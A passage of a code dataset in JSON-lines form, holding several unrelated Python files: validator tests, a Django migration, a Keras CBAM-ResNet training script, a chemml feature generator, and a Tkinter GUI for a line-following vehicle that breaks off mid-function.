validate_actions([{\"type\": \"MYACT1\"}])\n\n def test_valid_my_action(self):\n assert validate_actions([{\"type\": \"MYACT\"}]) is None\n\n def test_course_completion_valid(self):\n assert validate_actions([{\"type\": \"COURSE_COMPLETION\"}]) is None\n assert validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": []}]) is None\n assert validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": [1,2,3,4]}]) is None\n\n def test_course_completion_invalid(self):\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": \"\"}])\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": \"COURSE_COMPLETION\", \"extra_courses\": [\"1\", \"2\"]}])\n\n def test_clesson_completion_invalid(self):\n with pytest.raises(ValidationError):\n validate_actions([{\"type\": 
\"CLESSON_COMPLETION1\"}])\n\n def test_clesson_completion_valid(self):\n assert validate_actions([{\"type\": \"CLESSON_COMPLETION\"}]) is None\n\n ACTION_REQUEST_DATA_INVALID = (\n (\n {\n \"achievement_id\": -1,\n \"level\": -2,\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": 1,\n \"level\": -2,\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": -1,\n \"level\": -1,\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": 1,\n \"level\": -1,\n }\n ),\n )\n\n @pytest.mark.parametrize('request_data', ACTION_REQUEST_DATA_INVALID)\n def test_request_achievement_action_invalid(self, request_data):\n request_dict = {\n **{\"type\": \"REQUEST_ACHIEVEMENT_ACTION\"}, **request_data,\n }\n\n with pytest.raises(ValidationError):\n validate_actions(\n [\n request_dict,\n ]\n )\n\n ACTION_REQUEST_DATA_VALID = (\n (\n {\n \"achievement_id\": 1,\n \"level\": \"-1\",\n \"comment\": \"qwerty\",\n }\n ),\n (\n {\n \"achievement_id\": 1,\n \"level\": \"1\",\n \"comment\": \"qwerty\",\n }\n ),\n )\n\n @pytest.mark.parametrize('request_data', ACTION_REQUEST_DATA_VALID)\n def test_request_achievement_action_valid(self, request_data):\n request_dict = {\n **{\"type\": \"REQUEST_ACHIEVEMENT_ACTION\"}, **request_data,\n }\n\n assert validate_actions([request_dict]) is None\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/test_actions.py","file_name":"test_actions.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10756939353","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('liberator_api', '0002_usermeta'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Book',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=600)),\n ('author', models.CharField(max_length=50)),\n ('description', models.TextField(blank=True)),\n ('cover', models.ImageField(upload_to=b'covers/', blank=True)),\n ('ISBN', models.CharField(max_length=14, blank=True)),\n ],\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='avatar',\n field=models.ImageField(upload_to=b'user_avatars/', blank=True),\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='description',\n field=models.TextField(blank=True),\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='displayName',\n field=models.CharField(max_length=50, blank=True),\n ),\n migrations.AlterField(\n model_name='usermeta',\n name='tagline',\n field=models.CharField(max_length=100, blank=True),\n ),\n ]\n","repo_name":"almithani/liberator_api","sub_path":"liberator_api/migrations/0003_auto_20151202_1724.py","file_name":"0003_auto_20151202_1724.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33044350623","text":"import tensorflow as tf\r\nfrom keras import layers\r\nfrom keras.layers import Reshape\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\n# Load the SSDResNet50 architecture\r\nmodel = tf.keras.applications.ResNet50(\r\n include_top=False,\r\n weights=None,\r\n input_shape=(224, 224, 3)\r\n)\r\n\r\nclass CBAM(tf.keras.layers.Layer):\r\n def __init__(self, reduction_ratio=8, name=None):\r\n super(CBAM, 
self).__init__(name=name)\r\n        self.reduction_ratio = reduction_ratio\r\n\r\n    # the original layer shapes were inconsistent (a (1,1,C) pooled tensor was\r\n    # concatenated with an (H,W,C) feature map), so the block below follows the\r\n    # standard CBAM layout: channel attention from a shared MLP over average-\r\n    # and max-pooled descriptors, then a 7x7 conv for spatial attention\r\n    def build(self, input_shape):\r\n        channels = int(input_shape[-1])\r\n        self.fc1 = tf.keras.layers.Dense(units=channels // self.reduction_ratio, activation='relu')\r\n        self.fc2 = tf.keras.layers.Dense(units=channels)\r\n        self.spatial_conv = tf.keras.layers.Conv2D(filters=1, kernel_size=7, padding='same', activation='sigmoid')\r\n        super(CBAM, self).build(input_shape)\r\n    \r\n    def call(self, inputs):\r\n        # Channel Attention: shared MLP on the pooled channel descriptors\r\n        gap = tf.reduce_mean(inputs, axis=[1, 2])\r\n        gmp = tf.reduce_max(inputs, axis=[1, 2])\r\n        ca = tf.nn.sigmoid(self.fc2(self.fc1(gap)) + self.fc2(self.fc1(gmp)))\r\n        x = inputs * ca[:, tf.newaxis, tf.newaxis, :]\r\n\r\n        # Spatial Attention: 7x7 conv over channel-wise mean and max maps\r\n        avg_map = tf.reduce_mean(x, axis=-1, keepdims=True)\r\n        max_map = tf.reduce_max(x, axis=-1, keepdims=True)\r\n        sa = self.spatial_conv(tf.concat([avg_map, max_map], axis=-1))\r\n        return x * sa\r\n    \r\n\r\nclass CBAMResBlock(tf.keras.layers.Layer):\r\n    def __init__(self, filters, kernel_size, stride=1, downsample=None):\r\n        super(CBAMResBlock, self).__init__()\r\n\r\n        self.conv1 = tf.keras.layers.Conv2D(filters=filters,\r\n                                            kernel_size=kernel_size,\r\n                                            strides=stride,\r\n                                            padding='same')\r\n        self.bn1 = tf.keras.layers.BatchNormalization()\r\n        self.cbam = CBAM()\r\n        self.conv2 = tf.keras.layers.Conv2D(filters=filters,\r\n                                            kernel_size=kernel_size,\r\n                                            strides=1,\r\n                                            padding='same')\r\n        self.bn2 = tf.keras.layers.BatchNormalization()\r\n        self.relu = tf.keras.layers.ReLU()\r\n        self.downsample = downsample\r\n\r\n    def call(self, inputs, training=False):\r\n        identity = inputs\r\n\r\n        x = self.conv1(inputs)\r\n        x = self.bn1(x, training=training)\r\n        x = self.cbam(x)\r\n        x = self.relu(x)\r\n\r\n        x = self.conv2(x)\r\n        x = self.bn2(x, training=training)\r\n\r\n        if self.downsample is not None:\r\n            identity = self.downsample(inputs)\r\n\r\n        x += identity\r\n        x = self.relu(x)\r\n\r\n        return x\r\n    \r\ndef make_cbam_resnet50(input_shape, num_classes, reduction_ratio=8):\r\n    inputs = tf.keras.Input(shape=input_shape)\r\n\r\n    # Initial Convolutional Layers\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=7, strides=2, padding='same')(inputs)\r\n    x = tf.keras.layers.BatchNormalization()(x)\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n    x = tf.keras.layers.MaxPooling2D(pool_size=3, strides=2, padding='same')(x)\r\n    trunk = x\r\n\r\n    # Residual Layers with CBAM\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n    x = tf.keras.layers.BatchNormalization()(x)\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n    x = tf.keras.layers.BatchNormalization()(x)\r\n    x = CBAM(reduction_ratio=reduction_ratio)(x)\r\n    # project the pooled trunk (not the raw inputs) so the residual shapes match\r\n    shortcut = tf.keras.layers.Conv2D(filters=64, kernel_size=1, strides=1, padding='same')(trunk)\r\n    shortcut = tf.keras.layers.BatchNormalization()(shortcut)\r\n    x = tf.keras.layers.Add()([x, shortcut])\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n    x = tf.keras.layers.BatchNormalization()(x)\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n    x = 
tf.keras.layers.BatchNormalization()(x)\r\n    x = CBAM(reduction_ratio=reduction_ratio)(x)\r\n    x = tf.keras.layers.Add()([x, shortcut])\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n    x = tf.keras.layers.BatchNormalization()(x)\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n    x = tf.keras.layers.Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(x)\r\n    x = tf.keras.layers.BatchNormalization()(x)\r\n    x = CBAM(reduction_ratio=reduction_ratio)(x)\r\n    x = tf.keras.layers.Add()([x, shortcut])\r\n    x = tf.keras.layers.Activation('relu')(x)\r\n\r\n    # Final Classification Layers\r\n    x = tf.keras.layers.GlobalAveragePooling2D()(x)\r\n    x = tf.keras.layers.Dense(units=num_classes, activation='softmax')(x)\r\n\r\n    model = tf.keras.Model(inputs=inputs, outputs=x, name='cbam_resnet50')\r\n    return model\r\n\r\n# Sample training script\r\ntrain_datagen = ImageDataGenerator(rescale=1./255, validation_split=0.2)\r\n\r\ntrain_generator = train_datagen.flow_from_directory('./data/train',\r\n                                                    target_size=(224, 224),\r\n                                                    batch_size=32,\r\n                                                    class_mode='categorical',\r\n                                                    subset='training'\r\n)\r\n\r\nvalidation_generator = train_datagen.flow_from_directory('./data/test',\r\n                                                         target_size=(224, 224),\r\n                                                         batch_size=32,\r\n                                                         class_mode='categorical',\r\n                                                         subset='validation'\r\n)\r\n\r\nmodel = make_cbam_resnet50(input_shape=(224, 224, 3), num_classes=10)\r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.fit(train_generator, validation_data=validation_generator, epochs=10)","repo_name":"samuelokpor/modiffed-SSD-with-Attention-Mechanisms","sub_path":"mainutils.py","file_name":"mainutils.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"36768158130","text":"import pandas as pd\nimport numpy as np\nimport types\nfrom ....data.materials.CrystalStructureEntry import CrystalStructureEntry\n\nclass StructuralHeterogeneityAttributeGenerator:\n    \"\"\"Class to compute attributes based on heterogeneity in structure.\n    Measures variance in bond lengths (both for a single atom and between\n    different atoms) and atomic volumes. Also considers the number of unique\n    coordination polyhedron shapes.\n    Bond lengths, atomic volumes, and coordination polyhedra are based on the\n    Voronoi tessellation of the structure.\n\n    Notes\n    -----\n    Current attributes:\n    1. Mean absolute deviation in average bond length for each atom, normalized\n    by mean for all atoms.\n    2. Minimum in average bond length, normalized by mean for all atoms.\n    3. Maximum in average bond length, normalized by mean for all atoms.\n    4. Mean bond length variance between bonds across all atoms.\n    5. Mean absolute deviation in bond length variance.\n    6. Minimum bond length variance.\n    7. Maximum bond length variance.\n    8. Mean absolute deviation in atomic volume, normalized by mean atomic\n    volume.\n\n    Here, bond length variation for a single atom is defined as:\n    .. math:: \hat{l} = \frac{\langle | l_i - \bar{l} | \rangle}{\bar{l}}\n    where :math:`l_i` is the distance between an atom and one of its\n    neighbors and :math:`\bar{l}` is the mean bond length for that atom.\n\n    \"\"\"\n\n    def generate_features(self, entries):\n        \"\"\"Function to generate features as mentioned in the class description.\n\n        Parameters\n        ----------\n        entries : array-like\n            Crystal structures for which features are to be generated. A list\n            of CrystalStructureEntry's.\n\n        Returns\n        ----------\n        features : DataFrame\n            Features for the given entries. 
Pandas data frame containing the\n names and values of the descriptors.\n\n Raises\n ------\n ValueError\n If input is not of type list.\n If items in the list are not CrystalStructureEntry instances.\n\n \"\"\"\n\n # Initialize lists of feature values and headers for pandas data frame.\n feat_values = []\n feat_headers = []\n\n # Raise exception if input argument is not of type list of\n # CompositionEntry's.\n if not isinstance(entries, list):\n raise ValueError(\"Argument should be of type list of \"\n \"CrystalStructureEntry's\")\n elif (entries and not isinstance(entries[0], CrystalStructureEntry)):\n raise ValueError(\"Argument should be of type list of \"\n \"CrystalStructureEntry's\")\n\n # Insert header names here.\n feat_headers.append(\"var_MeanBondLength\")\n feat_headers.append(\"min_MeanBondLength\")\n feat_headers.append(\"max_MeanBondLength\")\n feat_headers.append(\"mean_BondLengthVariation\")\n feat_headers.append(\"var_BondLengthVariation\")\n feat_headers.append(\"min_BondLengthVariation\")\n feat_headers.append(\"max_BondLengthVariation\")\n feat_headers.append(\"var_CellVolume\")\n\n l_fh = len(feat_headers)\n # Generate features for each entry.\n for entry in entries:\n tmp_list = []\n # Get the Voronoi tessellation.\n try:\n voro = entry.compute_voronoi_tessellation()\n except Exception:\n tmp_list = [np.nan] * l_fh # If tessellation fails.\n feat_values.append(tmp_list)\n continue\n\n # Bond length features.\n # Variation between cells.\n mean_bond_lengths = voro.mean_bond_lengths()\n mean_bond_lengths /= np.mean(mean_bond_lengths) # Normalize bond\n # lengths.\n m = np.mean(mean_bond_lengths)\n tmp_list.append(np.mean([abs(x - m) for x in mean_bond_lengths]))\n tmp_list.append(np.min(mean_bond_lengths))\n tmp_list.append(np.max(mean_bond_lengths))\n\n # Variation within a single cell.\n mean_bond_lengths = voro.mean_bond_lengths() # Recompute bond\n # lengths.\n bond_length_variation = voro.bond_length_variance(\n mean_bond_lengths)\n # Normalize bond length variation by mean bond length of each cell.\n bond_length_variation /= mean_bond_lengths\n m = np.mean(bond_length_variation)\n tmp_list.append(m)\n tmp_list.append(np.mean([abs(x - m) for x in\n bond_length_variation]))\n tmp_list.append(np.min(bond_length_variation))\n tmp_list.append(np.max(bond_length_variation))\n\n # Cell volume / shape features.\n tmp_list.append(voro.volume_variance() * entry.get_structure(\n ).n_atoms() / entry.get_structure().volume())\n\n feat_values.append(tmp_list)\n\n features = pd.DataFrame(feat_values, columns=feat_headers)\n return features\n","repo_name":"hachmannlab/chemml","sub_path":"chemml/chem/magpie_python/attributes/generators/crystal/StructuralHeterogeneityAttributeGenerator.py","file_name":"StructuralHeterogeneityAttributeGenerator.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"3"} +{"seq_id":"27764789839","text":"import tkinter as tk\nimport json\nimport time\nimport subprocess\nimport sys\nimport psutil\nimport os\n\n# Create the main window\nroot = tk.Tk()\nroot.geometry(\"960x540\")\nroot.title(\"LYNY\")\n\nemergency_stop_status = False\nnitros_on_status = False\ncrawl_on_status = False\n\nw_status = False\na_status = False\ns_status = False\nd_status = False\n\ntest_process = None\n#8 17\n\n# Function to create a rounded rectangle\ndef round_rectangle(canvas, x1, y1, x2, y2, radius, **kwargs):\n points = [x1 + radius, y1,\n x1 + radius, y1,\n x2 - radius, y1,\n x2 - 
radius, y1,\n x2, y1,\n x2, y1 + radius,\n x2, y1 + radius,\n x2, y2 - radius,\n x2, y2 - radius,\n x2, y2,\n x2 - radius, y2,\n x2 - radius, y2,\n x1 + radius, y2,\n x1 + radius, y2,\n x1, y2,\n x1, y2 - radius,\n x1, y2 - radius,\n x1, y1 + radius,\n x1, y1 + radius,\n x1, y1]\n\n return canvas.create_polygon(*points, **kwargs, smooth=True)\n\n# Define the coordinates and dimensions for the four main parts\npart1 = (44, 74, 460, 250)\npart2 = (44, 290, 460, 520)\npart3 = (501, 74, 916, 304)\npart4 = (501, 340, 916, 516)\ntop_bar = (0, 0, 960, 54)\n\n# Create a canvas to draw the rounded rectangles\ncanvas = tk.Canvas(root, width=960, height=540, background=\"#ebebeb\")\ncanvas.pack()\n\n# Function to update the top bar sections with JSON data\ndef update_top_bar(data):\n top_bar_part1_text = f\"Serial Port: {data.get('serial_port', 'N/A')}\"\n\n top_bar_part2_text = f\"Baud Rate: {data.get('baud_rate', 'N/A')}\"\n\n if 'connected' in data:\n if data['connected']:\n top_bar_part3_fill = \"green\"\n top_bar_part3_text = \"Connected\"\n else:\n top_bar_part3_fill = \"black\"\n top_bar_part3_text = \"Not Connected\"\n else:\n # Handle the case where 'connected' key is not present in 'data'\n top_bar_part3_fill = \"black\"\n top_bar_part3_text = \"Not Connected\"\n \n # Update the text on the canvas items\n canvas.itemconfig(top_bar_part1_text_item, text=top_bar_part1_text)\n canvas.itemconfig(top_bar_part2_text_item, text=top_bar_part2_text,font =144)\n canvas.itemconfig(top_bar_part3_text_item, text=top_bar_part3_text, fill=top_bar_part3_fill, font =144)\n\ndef calculate_duty_cycle(dac_value):\n # Calculate y using the equation y = 0.3631x + 1E-13\n y = 0.3631 * dac_value + 1E-13\n return y\n\n# Read the JSON data from a file\nwith open('to_gui.json', 'r') as file:\n json_data = json.load(file)\n\n# Draw the four main rounded rectangles with the specified fill colors\nround_rectangle(canvas, *part1, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *part2, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *part3, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *part4, radius=30, fill=\"#ffffff\")\nround_rectangle(canvas, *top_bar, radius=0, fill=\"gray\")\n\n# Add additional parts in the top bar with corner radius of 14 and specified dimensions and colors\ntop_bar_part1 = (44, 10, 230, 46)\ntop_bar_part2 = (252, 10, 438, 46)\ntop_bar_part3 = (501, 10, 687, 46)\ntop_bar_part4 = (730, 10, 916, 46)\n\nif json_data['connected']:\n contfill = \"#42fe65\"\nelse:\n contfill = \"#fe4243\"\n\n\nround_rectangle(canvas, *top_bar_part1, radius=14, fill=\"#ebebeb\")\nround_rectangle(canvas, *top_bar_part2, radius=14, fill=\"#ebebeb\")\nround_rectangle(canvas, *top_bar_part3, radius=14, fill=contfill)\nround_rectangle(canvas, *top_bar_part4, radius=14, fill=\"#515151\")\n\n# Create text items to display information in the top bar with \"Syne\" font\nfont = (\"Syne\", 11)\n\ntop_bar_part1_text_item = canvas.create_text(137, 28, text=\"\", fill=\"black\", font=font)\ntop_bar_part2_text_item = canvas.create_text(345, 28, text=\"\", fill=\"black\", font=font)\ntop_bar_part3_text_item = canvas.create_text(594, 28, text=\"\", fill=\"white\", font=font)\n\n\n\n# Create text items to display information in part1 with the updated coordinates\nfont_size_24 = (\"Syne\", 24)\nfont_size_20 = (\"Syne\", 20)\n\n\n# Change the coordinates for the text items\nright_sensor_label_item = canvas.create_text(140, 100, text=\"\", fill=\"black\", font=font_size_24)\nright_value_text_item = canvas.create_text(255, 
100, text=\"\", fill=\"#23D692\", font=font_size_20)\nright_color_text_item = canvas.create_text(337, 100, text=\"\", fill=\"black\", font=font_size_20)\n\nleft_sensor_label_item = canvas.create_text(135, 138, text=\"\", fill=\"black\", font=font_size_24)\nleft_value_text_item = canvas.create_text(255, 138, text=\"\", fill=\"#23D692\", font=font_size_20)\nleft_color_text_item = canvas.create_text(337, 138, text=\"\", fill=\"black\", font=font_size_20)\n\n# Function to update part1 with JSON data\ndef update_part1(data):\n right_sensor_label = f\"Right Sensor\"\n right_value_text = f\"{data.get('right_value', 'N/A')}\"\n right_color_text = f\"{data.get('right_color', 'N/A')}\"\n\n \n left_sensor_label = f\"Left Sensor\"\n left_value_text = f\"{data.get('left_value', 'N/A')}\"\n left_color_text = f\"{data.get('left_color', 'N/A')}\"\n\n # Update the text on the canvas items\n canvas.itemconfig(right_sensor_label_item, text=right_sensor_label)\n canvas.itemconfig(right_value_text_item, text=right_value_text)\n canvas.itemconfig(right_color_text_item, text=right_color_text)\n \n canvas.itemconfig(left_sensor_label_item, text=left_sensor_label)\n canvas.itemconfig(left_value_text_item, text=left_value_text)\n canvas.itemconfig(left_color_text_item, text=left_color_text)\n\n\n# Use the get method with a default value of 'N/A' for dac1_value\ndac1_value = json_data.get('dac1_value', 'N/A')\n\n# Use the get method with a default value of 'N/A' for dac2_value\ndac2_value = json_data.get('dac2_value', 'N/A')\n\n\n# Calculate duty cycles using the given equation\ndac1_duty_cycle = (0.3631 * dac1_value + 1E-13)/100\ndac2_duty_cycle = (0.3631 * dac2_value + 1E-13)/100\n# Create text items for the duty cycles\ndac1_duty_cycle_label_item = canvas.create_text(140, 175, text=\"Duty Cycles:\", fill=\"black\", font=font_size_24)\ndac1_duty_cycle_text_item = canvas.create_text(260, 175, text=\"\", fill=\"black\", font=font_size_20)\ndac2_duty_cycle_text_item = canvas.create_text(337, 175, text=\"\", fill=\"black\", font=font_size_20)\n\n# Function to calculate and update DAC duty cycles\ndef update_dac_duty_cycles(dac1_value,dac2_value):\n\n \n\n if isinstance(dac1_value, (int, float)):\n dac1_duty_cycle = (0.3631 * dac1_value + 1E-13) / 100\n else:\n # Handle the case where dac1_value is not numeric\n dac1_duty_cycle = 0 # or set a default value or take appropriate action\n \n # Check if dac1_value is numeric before performing the calculation\n if isinstance(dac2_value, (int, float)):\n dac2_duty_cycle = (0.3631 * dac2_value + 1E-13) / 100\n else:\n # Handle the case where dac1_value is not numeric\n dac2_duty_cycle = 0 # or set a default value or take appropriate action\n\n\n # Update the text on the canvas items\n canvas.itemconfig(dac1_duty_cycle_text_item, text=f\"{dac1_duty_cycle:.2%}\")\n canvas.itemconfig(dac2_duty_cycle_text_item, text=f\"{dac2_duty_cycle:.2%}\")\n\n return dac1_duty_cycle, dac2_duty_cycle \n\n# Add text label for the threshold\nthreshold_label_item = canvas.create_text(130, 213, text=\"Threshold:\", fill=\"black\", font=font_size_24)\n\n# Add a slider with a default value of 500\nslider = tk.Scale(root, from_=0, to=1000, orient='horizontal', length=200, troughcolor=\"white\", sliderlength=20)\nslider.set(500) # Set the initial value to 500\nslider_item = canvas.create_window(340, 213, window=slider)\n\n\nlive_motion_text = canvas.create_text(580, 100, text=\"Live motion\", fill=\"black\", font=font_size_24)\n\n\n# Define the toggle_live_motion function before creating 
live_motion_toggle\ndef toggle_live_motion():\n if live_motion_var.get():\n # Start displaying live motion data\n display_live_motion_data()\n else:\n # Handle turning off live motion (if needed)\n pass\n root.after(100, toggle_live_motion)\n\n\n# Create a variable to store the state of the toggle switch\nlive_motion_var = tk.BooleanVar()\n\n# Create the toggle switch\nlive_motion_toggle = tk.Checkbutton(root, text=\"Enable\", variable=live_motion_var, font=(\"Syne\", 16), bg=\"#ffffff\", command=toggle_live_motion)\nlive_motion_toggle.place(x=650, y=88) # Adjust the coordinates as needed\n\n# Create a list to store live motion data sets\nlive_motion_data = []\n\n# Create a list to store live motion data sets (as a global variable)\nlive_motion_data = []\n\n# Function to display live motion data with animation\ndef display_live_motion_data():\n global live_motion_data # Declare live_motion_data as a global variable\n\n # Get the canvas width and height\n canvas_width = canvas.winfo_width()\n canvas_height = canvas.winfo_height()\n\n # Coordinates for part3\n x_start = 750\n y_start = 130\n\n # Gap between each set of values\n gap = 40\n\n # Add the new data set to the list\n new_data_set = {\n \"command_sent\": json_data[\"command_sent\"], \n \"dac1_duty_cycle\": dac1_duty_cycle, \n \"dac2_duty_cycle\": dac2_duty_cycle, \n }\n \n # Append the new data set and keep only the last 4 data sets\n live_motion_data.append(new_data_set)\n # Ensure that the list contains a maximum of 4 data sets\n if len(live_motion_data) > 4:\n live_motion_data.pop(0) # Remove the oldest data set\n\n # Clear the part3 areax\n canvas.create_rectangle(650, 80,850 ,300, fill=\"white\")\n\n for data_set in live_motion_data:\n # Display the data on part3\n data_text = f\"{data_set['command_sent']} {data_set['dac1_duty_cycle']:.2%} {data_set['dac2_duty_cycle']:.2%}\"\n canvas.create_text(x_start, y_start, text=data_text, fill=\"black\", font=(\"Syne\", 20))\n\n # Move down for the next set of values\n y_start += gap\n\n # Update the GUI\n root.update()\n\n # Pause for a short time to create an animation effect\n time.sleep(0.3) # Adjust the duration as needed\n\n# Coordinates for the \"Quit\" button\nquit_button_x = 823\nquit_button_y = 28\n\n# Create the \"Quit\" button as text without a background\nquit_button_text_item = canvas.create_text(quit_button_x, quit_button_y, text=\"Quit\", fill=\"black\", font=25)\n\ndef quit():\n global test_process # Declare test_process as a global variable\n\n # Terminate the subprocess if it is running\n if test_process and test_process.poll() is None:\n test_process.terminate()\n\n # Exit the Tkinter application\n root.quit() # This will stop the code gracefully\n\n # Wait for the subprocess to complete (timeout: 5 seconds)\n if test_process:\n test_process.wait(timeout=5)\n\ncanvas.tag_bind(quit_button_text_item, '', lambda event: quit())\n\n\n# Create frames within part4 with different variables\nstart_frame = (612, 352, 805, 394) # Start frame\nemergency_stop_frame = (612, 412, 805, 454) # Emergency Stop frame\nnitros_frame = (547, 473, 675, 510) # Nitros frame\ncrawl_frame = (739, 473, 868, 510) # Crawl frame\n\n# Create rounded rectangles for the frames\nround_rectangle(canvas, *start_frame, radius=30, fill=\"#EBEBEB\")\nround_rectangle(canvas, *emergency_stop_frame, radius=30, fill=\"#FE4243\")\nround_rectangle(canvas, *nitros_frame, radius=30, fill=\"#42A4FE\")\nround_rectangle(canvas, *crawl_frame, radius=30, fill=\"#FEA842\")\n\n\n# Add the text \"Start\" to the 
frame\ncanvas.create_text(708, 373, text=\"START!\", fill=\"black\", font=(\"Syne\", 24))\n\n# Create a larger and more prominent toggle switch within the frame\nstart_toggle_var = tk.BooleanVar()\nstart_toggle = tk.Checkbutton(root, variable=start_toggle_var, onvalue=True, offvalue=False, font=(\"Syne\", 16), bg=\"#EBEBEB\")\nstart_toggle_item = canvas.create_window(769, 374, window=start_toggle)\n\n\n# Create the \"Manual Control\" text in part2\nmanual_control_text_item = canvas.create_text(159, 310, text=\"Manual Control\", fill=\"black\", font=(\"Syne\", 24))\n\n# Create a toggle switch for manual control in part2\nmanual_control_toggle_var = tk.BooleanVar()\nmanual_control_toggle = tk.Checkbutton(root, variable=manual_control_toggle_var, onvalue=True, offvalue=False, font=(\"Syne\", 16), bg=\"white\")\nmanual_control_toggle_item = canvas.create_window(269, 310, window=manual_control_toggle)\n\n\nimage = tk.PhotoImage(file='manual.png')\n\n# Create a canvas image item at point (45, 332)\nimage_item = canvas.create_image(45, 332, anchor='nw', image=image)\n\n# Create a vertical slider at coordinates (x=281, y=337)\nvertical_slider = tk.Scale(root, from_=100, to=0, orient='vertical', length=170, troughcolor=\"white\", sliderlength=20)\nvertical_slider.set(0) # Set the initial value\nvertical_slider_item = canvas.create_window(265, 430, window=vertical_slider)\n\n# Define the coordinates and dimensions for the gauge\ngauge_x = 315\ngauge_y = 435\ngauge_width = 130\ngauge_height = 147\n\n# Create a gauge on the canvas\ngauge = canvas.create_arc(gauge_x, gauge_y, gauge_x + gauge_width, gauge_y + gauge_height, start=0, extent=0, fill=\"#FE4243\", width=2)\n\n# Function to update the gauge with the average value\ndef update_gauge(average_value):\n    # Calculate the extent based on the average value (assuming the range is 0-100)\n    extent = average_value * 1.8 # Scale the extent for the gauge\n\n    # Update the gauge on the canvas\n    canvas.itemconfig(gauge, extent=extent)\n\nupdate_gauge(dac2_duty_cycle * 100)\n\n# Define the coordinates and dimensions for the new gauge\nnew_gauge_x = 315\nnew_gauge_y = 350\ngauge_width = 130\ngauge_height = 147\n\n# Create a new gauge on the canvas\nnew_gauge = canvas.create_arc(new_gauge_x, new_gauge_y, new_gauge_x + gauge_width, new_gauge_y + gauge_height, start=0, extent=0, fill=\"#FE4243\", width=2)\n\n# Function to update the new gauge with the average value\ndef update_new_gauge(average_value):\n    # Calculate the extent based on the average value (assuming the range is 0-100)\n    extent = average_value * 1.8 # Scale the extent for the gauge\n\n    # Update the new gauge on the canvas\n    canvas.itemconfig(new_gauge, extent=extent)\n\n\nupdate_new_gauge(dac1_duty_cycle * 100)\n\ncrawl_button_text_item = canvas.create_text(805, 492, text=\"Snail\", fill=\"#804500\", font=(\"Syne\", 20))\n# Add the \"Emergency Stop\" text to the frame\nemergency_stop_text_item = canvas.create_text(708, 433, text=\"EMERGENCY STOP\", fill=\"#A60000\", font=(\"Syne\", 20))\nnitros_button_text_item = canvas.create_text(612, 492, text=\"Nitros\", fill=\"#00386B\", font=(\"Syne\", 20))\n\ndef update_gui():\n    try:\n        # Read the JSON data from a file\n        with open('to_gui.json', 'r') as file:\n            json_data = json.load(file)\n    except Exception as e:\n        # Handle the exception (print an error message or take other actions)\n        print(f\"Error: {e}\")\n        json_data = {} # Set a default value or an empty dictionary if the JSON loading fails\n\n    # Update the top bar\n    
update_top_bar(json_data)\n\n    # Update part1\n    update_part1(json_data)\n    # Use the get method with a default value of 'N/A' for dac1_value\n    dac1_value = json_data.get('dac1_value', 'N/A')\n\n    # Use the get method with a default value of 'N/A' for dac2_value\n    dac2_value = json_data.get('dac2_value', 'N/A')\n\n    update_dac_duty_cycles(dac1_value, dac2_value)\n\n    # Schedule the update every 100 ms\n    root.after(100, update_gui)\n\n\n    # Define the Emergency Stop button function\n    def emergency_stop_action():\n        global emergency_stop_status # Make sure to use the global variable\n        emergency_stop_status = not emergency_stop_status # Toggle the status\n        # Implement the logic to send commands or perform actions based on emergency_stop_status\n        if emergency_stop_status:\n            # If emergency_stop_status is True, perform the corresponding action\n            pass\n        else:\n            # If emergency_stop_status is False, perform the corresponding action\n            pass\n\n\n    # Bind the \"Emergency Stop\" button text to the emergency_stop_action function\n    canvas.tag_bind(emergency_stop_text_item, '<Button-1>', lambda event: emergency_stop_action())\n\n    # Define the Nitros button function\n    def nitros_button_action():\n        global nitros_on_status # Make sure to use the global variable\n        nitros_on_status = not nitros_on_status # Toggle the status\n        # Implement the logic to send commands or perform actions based on nitros_on_status\n        if nitros_on_status:\n            # If nitros_on_status is True, perform the corresponding action\n            pass\n        else:\n            # If nitros_on_status is False, 